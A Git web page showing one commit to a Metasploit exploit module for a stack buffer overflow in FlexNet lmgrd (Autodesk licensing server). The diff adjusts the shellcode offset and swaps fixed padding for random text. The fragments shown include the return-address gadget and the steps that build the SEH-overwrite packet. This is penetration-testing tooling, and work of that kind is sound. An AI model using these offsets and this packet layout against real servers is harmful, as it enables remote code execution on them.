infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

flexnet_lmgrd_bof rand_text fix

unstable
jvazquez-r7 2012-05-24 18:02:25 +02:00
parent 0ecffd22b1
commit f7224ab306
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/windows/license/flexnet_lmgrd_bof.rb
View File

@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3', [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
{ {
'Offset' => 10476, 'Offset' => 10476,
'ShellcodeOffset' => 5504, 'ShellcodeOffset' => 5484,
'Ret' => 0x0047d01f # ppr from lmgrd.exe 'Ret' => 0x0047d01f # ppr from lmgrd.exe
} }
], ],
@ -186,7 +186,8 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name =~ /Debug/ if target.name =~ /Debug/
pkt_data << "a" * (65535 - header_length) pkt_data << "a" * (65535 - header_length)
else else
pkt_data << "a" * target['ShellcodeOffset']
pkt_data << rand_text(target['ShellcodeOffset'])
pkt_data << my_payload pkt_data << my_payload
pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length) pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
pkt_data << generate_seh_record(target.ret) pkt_data << generate_seh_record(target.ret)